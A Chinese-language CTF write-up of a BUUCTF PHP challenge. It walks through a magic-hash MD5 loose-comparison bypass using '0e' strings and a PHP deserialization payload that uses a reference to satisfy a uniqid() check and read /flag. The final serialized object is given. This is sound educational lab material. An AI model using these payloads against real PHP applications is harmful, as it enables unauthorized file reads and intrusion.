题目源码
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/10/6
* Time: 8:04 PM
*/
highlight_file(__FILE__);
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
if($_GET['pleaseget'] === '1') {
if($_POST['pleasepost'] === '2') {
if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
unserialize($_POST['obj']);
}
}
}
首先我们可以看到这份php代码有两个部分:类函数、条件判断
大致流程
第一个if满足进入的条件为get 传参的值为1 。
第二个if满足条件为post 传参的值为2 。
第三个if满足条件为 需要两个不同的数。且这两个不同的数值的md5 的却相同 。
如果 1、2、3 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入类函数
类函数也有一个if满足条件为属性correct与属性input相等。 但是correct 却是利用一个时间进行计算的值的base64 值。
那么为什么执行反序列化就会自动进行类函数执行呢,我们来了解一下魔术方法
魔术方法(Magic Methods)
在PHP中,魔术方法(Magic Methods)是一些具有特殊名字和功能的方法,它们允许你在类中执行特殊的操作。这些方法的名字都以双下划线 --开头和结尾。魔术方法提供了一种在特定事件发生时自动调用的机制,以增强类的行为。
__destruct:
当一个对象被销毁时调用,用于清理资源或执行其他操作。如本题
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
实战流程
1.get传参1
2.post传参2
在bp上转换method,pleaseget会自动下来,要自己手动改成post后面
3.md5值比较
md51 !=md52 但是要满足md5(md51) ==md5(md52)
又要相等,又要不等看起来看离谱。但是在弱类型比较中是可以实现的
在 PHP 中,弱类型比较是指在比较两个值时,PHP 尝试将它们转换为相同的类型,然后再进行比较。在弱类型比较中,如果两个值的类型不同,PHP 会尝试根据一定的规则将它们转换为相同的类型,然后再进行比较。
但是呢!解决方法就是:
在 PHP 中,如果字符串以 0e 开头并且后面是纯数字,它会被解释为科学计数法,并且其值会被认为是 0。
这是因为在 PHP 中,0e 表示 0 乘以 10 的某个次方,而后面的数字表示指数。由于 0 乘以任何数都是 0,所以整个表达式的结果被解释为 0。这可能导致一些安全性问题,尤其是在处理哈希比较时。
例如:
$str1 = '0e12345';
$str2 = '0e67890';
if ($str1 == $str2) {
echo "Equal";
} else {
echo "Not equal";
}
尽管 $str1 和 $str2 是不同的字符串,由于它们都以 0e 开头并后跟数字,它们被弱类型比较认为是相等的,输出 “Equal”。
所以我们现在就可以找两个值加密后0e开头,且0e后面是纯数字的字符串即可(有很多,大家可以去搜搜)
字符串 | md5 |
---|---|
QNKCDZO | 0e830400451993494058024219903391 |
s155964671a | 0e342768416822451524974117254469 |
s878926199a | 0e545993274517709034328855841020 |
接下来就可以写第三步的传参,传参方式和post一样, 使用& 符号链接。 内容如下图
4. 序列化构造(引用!)
<?php
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
$a=new BUU();
$a->input=&$a->correct;
echo serialize($a);
?>
为什么要这么构造呢?因为uniqid() 产生的数是随时变化的,无法预测,所以input 传值多少无法确定。那么我们就得把值确定下来,这个引用就类似c++指针一样,引用是一种使两个变量共享同一内存空间的机制
举例:
$a = 5;
$b = &$a; // $b 是 $a 的引用
echo $a; // 输出 5
echo $b; // 输出 5
$b = 10; // 修改 $b 的值,也会影响 $a
echo $a; // 输出 10
echo $b; // 输出 10
ok 得到obj的值是O:3:“BUU”:2:{s:7:“correct”;s:0:“”;s:5:“input”;R:2;}